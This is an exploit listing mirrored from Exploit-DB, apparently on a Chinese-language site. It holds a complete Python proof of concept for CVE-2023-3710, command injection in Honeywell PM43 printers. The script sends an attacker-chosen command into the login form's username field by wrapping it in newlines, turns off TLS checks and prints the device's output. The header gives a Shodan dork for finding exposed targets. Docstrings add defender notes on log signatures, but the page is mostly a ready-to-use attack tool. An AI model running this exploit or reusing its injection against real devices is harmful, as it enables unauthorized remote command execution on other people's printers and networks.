Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)

  • 作者: ByteHunter
    日期: 2024-03-14
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51885/
  • #- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)
    #- Shodan Dork: http.title:PM43 , PM43
    #- Exploit Author: ByteHunter
    #- Email: 0xByteHunter@proton.me
    #- Firmware Version: versions prior to P10.19.050004
    #- Tested on: P10.17.019667
    #- CVE : CVE-2023-3710
    
    
    import requests
    import argparse
    
    # ANSI escape sequences used only to colour this script's terminal output;
    # RESET restores the terminal's default colour.
    BLUE, YELLOW, RESET = '\033[94m', '\033[93m', '\033[0m'
    
    def banner():
        """Print the script's identification banner (CVE id, product, author) in yellow."""
        # The local is named differently from the function so the function
        # name is not shadowed inside its own body.
        box_text = """
    ╔════════════════════════════════════════════════╗
    CVE-2023-3710 
    Command Injection in Honeywell PM43 Printers
    Author: ByteHunter
    ╚════════════════════════════════════════════════╝
    """
        print(f"{YELLOW}{box_text}{RESET}")
    
    
    def run_command(url, command):
        """Send the CVE-2023-3710 proof-of-concept request and return the reply text.

        Posts a form with ``username`` and ``userpassword`` fields to
        ``<url>/loadfile.lp?pageid=Configure``. The ``username`` value is
        ``command`` wrapped in line breaks, which is the command injection
        named in this listing's title.

        Returns the response body up to the first ``<html>`` marker (the whole
        body when the marker is absent), or an ``Error: ...`` string when the
        request raises a ``requests`` exception.

        Defender notes: in web or proxy logs this request appears as a POST to
        ``/loadfile.lp?pageid=Configure`` whose ``username`` value contains
        newline characters. The header of this listing gives firmware versions
        prior to P10.19.050004 as affected.
        """
        endpoint = f"{url}/loadfile.lp?pageid=Configure"
        form_fields = {
            'username': f'hunt\n{command}\n',
            'userpassword': 'admin12345admin!!'
        }
        try:
            # verify=False turns off TLS certificate validation for this request.
            reply = requests.post(endpoint, data=form_fields, verify=False)
            # NOTE(review): the text ahead of '<html>' is presumably the device's
            # output for the injected line -- the page does not show a sample reply.
            # partition() yields the whole body when '<html>' is absent.
            leading_text, _, _ = reply.text.partition('<html>')
            return leading_text
        except requests.exceptions.RequestException as e:
            return f"Error: {e}"
    
    def main():
        """Parse the required --url and --run options, call run_command, and print its result in blue."""
        cli = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers')
        cli.add_argument('--url', dest='url', help='Target URL', required=True)
        cli.add_argument('--run', dest='command', help='Command to execute', required=True)
        opts = cli.parse_args()

        # run_command returns a string on both success and request failure,
        # so the result is printed without further checks.
        output = run_command(opts.url, opts.command)
        print(BLUE, output, RESET, sep='')
    
    # Script entry point: show the banner, then handle the command line.
    if __name__ == "__main__":
        banner()
        main()